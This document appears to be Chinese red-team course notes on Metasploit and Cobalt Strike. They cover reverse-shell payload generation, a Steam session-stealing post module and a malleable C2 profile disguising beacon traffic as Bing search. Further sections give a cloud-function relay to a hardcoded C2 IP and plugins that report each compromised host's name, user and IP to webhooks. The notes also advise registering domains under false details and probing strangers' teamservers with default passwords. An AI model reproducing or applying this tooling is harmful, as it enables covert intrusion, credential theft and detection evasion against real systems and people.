11.msf和cs补充
课前交流
aws云渗透
aws 控制台和机器是两套东西,相互之间既有链接,你的控制台有能控制机器的一部分,还有一部分你不能控制,甚至控制台还可以和其他的产品链接,实战中aws,都是从api key入手 , 在云环境中你做坏事,别人拍个快照恢复一下就好了,所以还是从云服务的账号入手
0x01.msf
1.msf的rc文件的编写
rc文件是msf魔改ruby的一种文件,你可以理解为就是msf的批处理文件
# 生成监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 你需要的ip
set lport 你需要的端口
exploit
# 使用
msfconsole -r xxx.rc
2.msf使用https监听
msf的本质就是一个tcp全连接,但是我们知道tcp传输数据是不加密的,很容易被分析出来,所以引入了https监听,大家都知道https是有一层ssl证书加密的,推荐使用付费证书,免费的,有几率被解密出来
1.生成ssl证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" -keyout www.google.com.key -out www.google.com.crt && cat www.google.com.key www.google.com.crt > www.google.com.pem && rm -f www.google.com.key www.google.com.crt
2.2 生成https的payload
# 需要开启msf自带的数据库
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.112 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=server.pem PayloadUUIDName=qqy -f exe -o /root/桌面/shell.exe
payloaduuidtracking是为了验证payload唯一性方式目标恶意重连(影响不大,开启数据库才会生效)
handlersslcert是用来指定刚才生成的ssl证书
payloaduuidname是指定uuid的名称
2.3 生成https的监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.112
set lport 4444
set payloaduuidtracking true
set handlersslcert server.pem (相对路径)
exploit
大家测试都是自己生成的证书上线不成功,需要网络购买证书
关于国内腾讯云证书的申请 (中间有一定验证时间)
1.购买一个域名
2.免费申请ssl证书
3.pem里面要在里面添加私钥(key)才可以用
还是失败了,建议更新msf
3.msf使用ngrock前置
1 sunny-ngrock官网注册登录
2 选择通道(推荐付费)
3 开通隧道,下载客户端
4 生成通道
./sunny clientid 7a109xxxx5e1bd7
5 生成ngrock的payload
msfvenom -p windows/meterpreter/reverse_https lhost=64.69.43.237 lport=10206 -f exe - o /root/桌面/shell.exe
lhost为你在ngrock上申请的地址(ping 一下)和lport的端口
6 生成ngrock的监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8080
exploit
这里的lhost设置为了127.0.0.1是因为ngrock已经指向了你的ip地址了 lport设置为转发的端口即可
补充:msf直接放在公网是很危险的,做这种前置是相对安全的(云函数很安全)
4.msf和钉钉联动
1 创建群
2 创建群机器人
3 复制webhook
4 msf中打开钉钉通知
进入msf后
load -l
load session_notifier
set_session_dingtalk_webhook 自己的webhook地址
start_session_notifier
常规监听,run
5.msf模块编写
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File # 包含一些库
include Msf::Auxiliary::Report
# 上面的东西需要什么就写什么
def initialize(info={})
super( update_info(info,
'Name' => 'Windows Gather Steam Client Session Collector.',
'Description' => %q{ This module will collect Steam session information from an account set to autologin. },
'License' => MSF_LICENSE,
'Author' => ['Nikolai Rusakov <nikolai.rusakov[at]gmail.com>'],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter' ]
))
end
# 上面的东西是表示show info里的信息
# 部分模块可以在上面写show option信息
# All that is needed to login to another Steam account is config.vdf,
# setting the AutoLoginUser to the proper username and RememberPassword
# to 1 in SteamAppData.vdf.
# Only tested on Win7 x64
#
# config.vdf , ContentCache element holds a K,V table of what appears
# to be UniqueID, Session. This is purely speculation as I have not
# reversed it to check. However the key is always unique to the account
# and the value changes whenever the account is logged out and then
# back in.
def run
#这里是功能代码
steamappdata = 'SteamAppData.vdf'
steamconfig = 'config.vdf' u_rx = /AutoLoginUser\W*\"(.*)\"/
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = progfiles_env['ProgramFiles(X86)']
if not progfilesx86.blank? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
progs = progfilesx86 # x64
else
progs = progfiles_env['ProgramFiles'] # x86
end
path = "#{progs}\\Steam\\config"
print_status("Checking for Steam configs in #{path}")
# Check if all the files are there.
if directory?(path) && file?("#{path}\\#{steamappdata}") && file?("# {path}\\#{steamconfig}") print_status("Located steam config files.")
sad = read_file("#{path}\\#{steamappdata}")
if sad =~ /RememberPassword\W*\"1\"/ #这里是poc判断
print_status("RememberPassword is set! Accountname is #{u_rx.match(sad) [1]}")
scd = read_file("#{path}\\#{steamconfig}")
steam_app_data_path = store_loot('steam.config', 'text/plain', session, sad, filename=steamappdata)
print_good("The file SteamAppData.vdf has been stored on # {steam_app_data_path}")
steam_config_path = store_loot('steam.config', 'text/plain', session, scd, filename=steamconfig)
print_good("The file config.vdf has been stored on # {steam_config_path}")
print_status("Steam configs harvested successfully!")
else
print_error("RememberPassword is not set, exiting.")
return
end
else
print_error("Steam configs not found.")
return
end
end
end
6.msf和python
作用:可以实现类似cs的分布式部署和批量化操作
# 安装
pip3 install pymetasploit3
# 操作msf
load msgrcp # 会给你一个msf的配置信息
# load msgrpc Pass=123 指定密码
msf6 > load msgrpc
[*] MSGRPC Service: 127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: 3Ly5NdVr
[*] Successfully loaded plugin: msgrpc
# 推荐pycharm写吧
from pymetasploit3.msfrpc import MsfRpcClient
client = MsfRpcClient('123',port=55552)#123是密码
client.modules.exploits #显示所有的exp
expolit = client.modules.use('exploit','需要使用的exp')
expolit.options #显示所有的选项
expolit['选项']='修改的值'
payload = client.modules.use('payload','需要使用的payload')
payload.options#显示所有的选项
payload['选项']='修改的值'
expolit.execute(payload=payload)
client.sessions.list #显示所有的会话
shell = client.sessions.session('会话id')
shell.write('输入的命令')
shell.read()#回显命令
python与msf结合开发的例子:viper
https://github.com/FunnyWolf/Viper
0x02.CS
1.修改默认端口
vim teamserver
#!/bin/bash
#
# Start Cobalt Strike Team Server
#
# make pretty looking messages (thanks Carlos)
function print_good () {
echo -e "\x1B[01;32m[+]\x1B[0m $1"
}
function print_error () {
echo -e "\x1B[01;31m[-]\x1B[0m $1"
}
function print_info () {
echo -e "\x1B[01;34m[*]\x1B[0m $1"
}
# check that we're r00t
if [ $UID -ne 0 ]; then
print_error "Superuser privileges are required to run the team server"
exit
fi
# check if java is available...
if [ $(command -v java) ]; then
true
else
print_error "java is not in \$PATH"
echo " is Java installed?"
exit
fi
# check if keytool is available...
if [ $(command -v keytool) ]; then
true
else
print_error "keytool is not in \$PATH"
echo " install the Java Developer Kit"
exit
fi
# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e ./cobaltstrike.store ]; then
print_info "Will use existing X509 certificate and keystore (for SSL)"
else
print_info "Generating X509 certificate and keystore (for SSL)"
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
-Dcobaltstrike.server_port=5555 这里可以修改默认端口
你可以去fofa上搜一搜那些50050端口的中国ip,看看123456能不能进去
2.修改证书
2.1 查看证书 cobaltstrike.store
默认在证书里面会有cobaltstrike字样,如果你直接用,那么无疑告诉别人你用cs连他了,身份很透明
查看默认证书
┌──(root💀kali)-[~/下载/cobaltstrike4]
└─# keytool -list -v -keystore cobaltstrike.store
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
输入密钥库口令:
密钥库类型: JKS
密钥库提供方: SUN
您的密钥库包含 1 个条目
别名: cobaltstrike
创建日期: 2019年3月17日
条目类型: PrivateKeyEntry
证书链长度: 1
证书[1]:
所有者: CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
发布者: CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
序列号: 48c38a7f
生效时间: Sun Mar 17 01:39:31 CST 2019, 失效时间: Sat Jun 15 01:39:31 CST 2019
证书指纹:
SHA1: 59:C8:D6:0F:0F:4B:6B:61:AD:DE:CF:3B:D3:B2:9B:72:E9:1A:31:6C
SHA256: 7B:49:FC:58:9E:7E:73:8E:34:57:85:9D:26:99:96:EC:EF:83:F6:93:57:0B:0A:C4:82:C4:26:B1:FA:04:BD:73
签名算法名称: SHA256withRSA
主体公共密钥算法: 2048 位 RSA 密钥
版本: 3
扩展:
#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 7E 80 01 F2 F6 C1 53 51 89 52 36 55 BB 92 D9 99 ......SQ.R6U....
0010: A1 C2 39 10 ..9.
]
]
*******************************************
*******************************************
Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。
默认密码是123456 以上内容是我修改后的证书内容
2.2 生成新的证书
keytool -keystore cobaltstrike_new.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias 360.com -dname "CN=US, OU=360.com, O=Software, L=Somewhere, ST=Cyberspace, C=CN"
2.3 重命名替换原文件
3.使用自己申请的证书
3.1 申请证书
ssl协议ssl加密免费ssl域名证书| Cloudflare 中国官网 | Cloudflare
或者letsencrypt或者各大云服务提供商
3.2 使用证书
pem格式:
openssl pkcs12 -export -in /api.xxx.com/sss.pem -inkey /api.xxx.com/ssk.pem -out api.xxx.com.p12 -name api.xxx.com -passout pass:123456 keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore api.xxx.com -src
把pem--》p12--》store文件
添加到temasrerver中:
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=40120 - Djavax.net.ssl.keyStore=./api.xx
添加到profile文件中:
https-certificate { set keystore “api.xxx.com.store”; set password “123456”; }
jks格式 ( 推荐 ) :
直接修改profile文件 ( cs的profile文件 ):
### Code Signing Certificate code-signer { set keystore "server.jks"; ### 这里是jks文件路径 set password "Tz8@CxnJcAN3DM^D";### 这里是密码 set alias "server"; }
crt格式:
$ keytool -import -trustcacerts -alias FILE -file FILE.crt -keystore domain.store $ keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
4.cs-profile文件(作业)
通信中的目的地会显示你的cs服务端ip,是很危险的 , 这个文件是自己创建的 , 然后放到cs目录下
可以通过c2clint检测这个文件好不好用 , 行为分析上可以绕过去
.
做个这个之后 , 再用cs
# CobaltStrike 4.0+ Test Profile
#
# References:
# * https://www.cobaltstrike.com/help-malleable-c2
# * https://www.cobaltstrike.com/help-malleable-postex
#
# Author: lengyi@HongHuLab
# Github: https://github.com/lengjibo
#
### Global Option Block
set sample_name "bing.profile"; # Profile name
set sleeptime "30000"; # Sleep time for the beacon callback
# set sleeptime "<60000>"; # 1 Minute
# set sleeptime "<70000>";
# set sleeptime "<80000>";
set jitter "50"; # Jitter to set %. In this example, the beacon will callback between 15 and 30 sec jitter
set dns_idle "8.8.4.4";
set dns_sleep "0";
set maxdns "235";
set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.
set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"; # User-Agent
### Self-Signed Certificate HTTPS
https-certificate {
set CN "us";
set O "us";
set C "us";
set L "us";
set OU "us";
set ST "us";
set validity "365";
}
### Valid SSL Certificate HTTPS
https-certificate {
set keystore "cobaltstrike.store";
set password "123456";
}
### Code Signing Certificate
code-signer {
set keystore "server.jks";
set password "Tz8@CxnJcAN3DM^D";
set alias "server";
}
### HTTP/S Global Response Header
http-config {
set headers "Server, Content-Type, Cache-Control, Connection, X-Powered-By"; # HTTP header
header "Server" "Microsoft-IIS/8.0";
header "Content-Type" "text/html;charset=UTF-8";
header "Cache-Control" "max-age=1";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
set trust_x_forwarded_for "false"; # "true" if the team server is behind an HTTP redirector
}
### SMB Beacon
set pipename "win_svc";
set pipename_stager "win_svc";
### TCP Beacon
set tcp_port "1337"; # TCP beacon listen port
### HTTP-GET
http-get {
set uri "/search/";
client {
header "Host" "www.bing.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";
metadata {
base64url;
parameter "q";
}
parameter "go" "Search";
parameter "qs" "bs";
parameter "form" "QBRE";
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
netbios;
prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
print;
}
}
}
### HTTP-POST
http-post {
set uri "/Search/";
set verb "GET";
client {
header "Host" "www.bing.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";
output {
base64url;
parameter "q";
}
parameter "go" "Search";
parameter "qs" "bs";
id {
base64url;
parameter "form";
}
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
netbios;
prepend "<!DOCTYPE html><html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:Web=\"http://schemas.live.com/Web/\"><script type=\"text/javascript\">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"XML\" type=\"text/xml\" /><link href=\"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE\" rel=\"alternate\" title=\"RSS\" type=\"application/rss+xml\" /><link href=\"/sa/simg/bing_p_rr_teal_min.ico\" rel=\"shortcut icon\" /><script type=\"text/javascript\">//<![CDATA[";
append "G={ST:(si_ST?si_ST:new Date),Mkt:\"en-US\",RTL:false,Ver:\"53\",IG:\"4C1158CCBAFC4896AD78ED0FF0F4A1B2\",EventID:\"E37FA2E804B54C71B3E275E9589590F8\",MN:\"SERP\",V:\"web\",P:\"SERP\",DA:\"CO4\",SUIH:\"OBJhNcrOC72Z3mr21coFQw\",gpUrl:\"/fd/ls/GLinkPing.aspx?\" }; _G.lsUrl=\"/fd/ls/l?IG=\"+_G.IG ;curUrl=\"http://www.bing.com/search\";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+\"IG=\"+_G.IG+\"&\"+a;}return true;};//]]></script><style type=\"text/css\">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
print;
}
}
}
### HTTP-stager
http-stager {
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
prepend "user=";
append ".asp";
print;
}
}
}
### Stage
stage {
set checksum "0";
set image_size_x86 "559966";
set image_size_x64 "559966";
set entry_point "38807";
set rich_header "\xcd\x11\x8f\xf8\x89\x70\xe1\xab\x89\x70\xe1\xab\x89\x70\xe1\xab\x3d\xec\x10\xab\x9c\x70\xe1\xab\x3d\xec\x12\xab\x0a\x70\xe1\xab\x3d\xec\x13\xab\x90\x70\xe1\xab\xea\x2d\xe2\xaa\x9b\x70\xe1\xab\xea\x2d\xe4\xaa\xae\x70\xe1\xab\xea\x2d\xe5\xaa\x9b\x70\xe1\xab\x80\x08\x72\xab\x82\x70\xe1\xab\x89\x70\xe0\xab\x03\x70\xe1\xab\xe7\x2d\xe4\xaa\x80\x70\xe1\xab\xe7\x2d\x1e\xab\x88\x70\xe1\xab\x89\x70\x76\xab\x88\x70\xe1\xab\xe7\x2d\xe3\xaa\x88\x70\xe1\xab\x52\x69\x63\x68\x89\x70\xe1\xab\x00\x00\x00\x00\x00\x00\x00\x00";
}
### Post-Exploitation
post-ex {
set amsi_disable "false"; # Disable AMSI
}
5.cdn前置(选做作业)
由于我的服务器用不了cloudflare,所以只是简单讲下过程
1.SSL证书(可以是自签名也可以是第三方免费申请的)
2.域名一个
3.cloudflare
添加你申请的域名,域名建议去godday申请,信息不要用自己的信息
2.去godday去掉默认的名称服务器,更改到cloudflare上
3.设置A记录 添加完A记录检查是否成功
4.设置SSL/TLS
5.添加https_beacon
6.生成一个exe上线测试
6.云函数前置(选做作业)
teamserver必须布置在公网ip上 , 目标回连的ip全是腾讯的ip , 这个也是会变的
6.1 登录腾讯云控制台 , 配置云函数(以腾讯为例,需要实名)
6.1.1 登录腾讯云控制台搜索云函数 , 选择新建
6.1.2 使用自定义创建
6.1.3 编写代码
import json, requests, base64
def main_handler(event, context):
C2 = 'http://116.63.138.59' # 这里可以使用 HTTP、HTTPS~下角标~
path = event['path']
headers = event['headers']
print(event)
if event['httpMethod'] == 'GET':
resp = requests.get(C2 + path, headers=headers, verify=False)
else:
resp = requests.post(C2 + path, data=event['body'], headers=headers, verify=False)
print(resp.headers)
print(resp.content)
response = {"isBase64Encoded": True, "statusCode": resp.status_code, "headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]}
return response
6.1.4 创建触发器
6.1.5 点击api服务名 修改为根路径
保存我们的公网访问地址中的域名
service-33fp49rg-1301783483.gz.apigw.tencentcs.com
6.2 配置cs的profile
set sleeptime "5000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";http-get { set uri "/api/x"; client { header "Accept" "*/*"; metadata { base64; prepend "SESSIONID="; header "Cookie"; } } server { header "Content-Type" "application/ocsp-response"; header "content-transfer-encoding" "binary"; header "Server" "nginx"; output { base64; print; } }}http-stager { set uri_x86 "/vue.min.js"; set uri_x64 "/bootstrap-2.min.js";}http-post { set uri "/api/y"; client { header "Accept" "*/*"; id { base64; prepend "JSESSION="; header "Cookie"; } output { base64; print; } } server { header "Content-Type" "application/ocsp-response"; header "content-transfer-encoding" "binary"; header "Connection" "keep-alive"; output { base64; print; } }}
启动cs
./teamserver ip 密码 tencent.profile
然后是cs的监听设置
上线即可
7.cs与server酱联动 (推荐钉钉)
1.申请api
http://sc.ftqq.com/3.version 使用github账号登录,将生成的SCKEY码保存好,并开通微信推送。
2.编写插件
使用的是sleep语言。很小众,这个语言是基于事件型的,当什么什么什么就什么什么,刚好满足我们的需求,当有beacon的时候给我们的server酱发送一个请求,然后微信好友server酱就会收到通知
# 插件源码
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#获取ip、计算机名、登录账号
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server酱的链接
$url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}
3.加载插件
4.上线测试
七月底server酱默认的那个服务接口就会停用 微信收的话可以用企业微信
把cna脚本添加到本地客户端后,如果beacon上线了,这个提醒的请求是从客户端发出的。 那么问题来了,如果我要接收通知,是不是就得一直开着客户端连着teamserver? 这样就非常不方便了,而且如果网络有波动,断开了到teamserver的连接,就收不到通知了。 CobaltStrike有两种加载插件的方法,一种是在客户端加载,一种是在服务端加载。在客户端加 载,当客户端没连接上服务端后,该插件即不会被加载。所以有时候需要在服务端加载某些插 件。 在服务器端有个 agscript 文件,他就是用来在服务器端运行cna文件的,这样就不用一直连着服 务器端
./agscript [host] [port] [user] [pass] </path/to/file.cna>
[host] #cs服务器的ip地址
[port] #cs的端口号
[user] #用户名,用来运行这个脚本的用户名,随便即可。
[pass] #cs的密码,就是启动cs时你设置的密码。
[path] #cna文件的路径。
但是我们一般会将其运行在后台:
nohup ./agscriptpt 192.168.107.129 50050 book4yi sws888 /root/桌面/cs3.14-extends/server_wechat_info/http_ftqq.cna &
8.cs与钉钉联动
钉钉机器人设置
在你的群里新建一个自定义机器人
保存token
插件源码
# author: TeamsSix
# 钉钉机器人配置
$DingDing_Robot_Token = 'your_token'; ### 钉钉机器人的token
$DingDing_Robot_Url = 'https://oapi.dingtalk.com/robot/send?access_token='.$DingDing_Robot_Token;
$Notice_Title = 'CS 有主机上线了!';
# 测试
on ready {
@curl_command = @('curl','-H','Content-Type: application/json','-d','{"msgtype": "text","text": {"content": "CS 钉钉机器人添加成功"}}',$DingDing_Robot_Url);
exec(@curl_command);
}
# 上线提醒:
on beacon_initial {
println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
local('$InternalIP $ComputerName $UserName');
$InternalIP = replace(beacon_info($1, "internal"), " ", "_");
$ComputerName = replace(beacon_info($1, "computer"), " ", "_");
$UserName = replace(beacon_info($1, "user"), " ", "_");
$Info = '# '.$Notice_Title.'\n\n计算机名称:'.$ComputerName.'\n\n用户名:'.$UserName.'\n\nIP 地址:'.$InternalIP;
@curl_command = @('curl','-H','Content-Type: application/json','-d','{"msgtype": "markdown","markdown": {"title":"'.$Notice_Title.'","text": "'.$Info.'"}}',$DingDing_Robot_Url);
exec(@curl_command);
}
cs服务端后台加载插件
nohup ./agscriptpt 192.168.107.129 50050 book4yi sws888 插件的路径 &
0x03.msf与cs互相转换(作业)
1.msf转cs
1.1 cs生成http监听
1.2 msf获得shell
1.3 使用payload_inject
设置的时候记得pyaload选http IP和端口选择cs的
2.cs转msf
2.1 cs获得shell
2.2 新建foreign_http监听(可选)
2.3 msf开启监听
2.4 右键spwan
0x04.打点
1.常见的打点方式
1.1 shell web rce的东西 传文件 敏感信息
1.2 钓鱼 (后面会补课)
0x05.流程
1 红队
1.接合同 注意事项:测试范围:ip 域名 包括物理范围 时间范围
2.规划整个行动的时间表和人员职责分配
3.针对职责分配和任务需要选择或者编写或者准备相应的工具
4.信息收集 主动 先做被动 maltego
信息收集:
一般都会有个初始目标。
从初始目标出发做被动信息收集。
开始主动信息收集。
整理信息。
分析信息。-》业务和功能
5.针对每一个收集到的信息手动查看这个信息的具体业务和功能
6.针对这个功能和业务做漏洞扫描
7.漏洞利用
8.权限维持
9.提权
10.横向
11.痕迹清理
12.写报告
2.网络犯罪组织
1.接单
2.目标和工具都比较固定,不用准备
3.信息收集可做可不做
4.漏洞扫描
5.漏洞利用
3.apt组织
1.接单 可做可不做
2.工具编写 ( 一般不用msf和cs )
3.信息收集 (擅长,最久的)
0x06.补充
FQ:
国外的服务器(banwagong)--》 为途锐(一般用这个)--》ssr
序列化
输入的数据,存储到计算机内存里面的时候,中间会转换,从人能够读得懂的1到计算机的内存能够读懂的1,这个转换过程就是序列化
反序列化
把计算机内存中的数据提取出来到人能够看懂的数据,这是反序列化
反序列化漏洞
利用链,拼接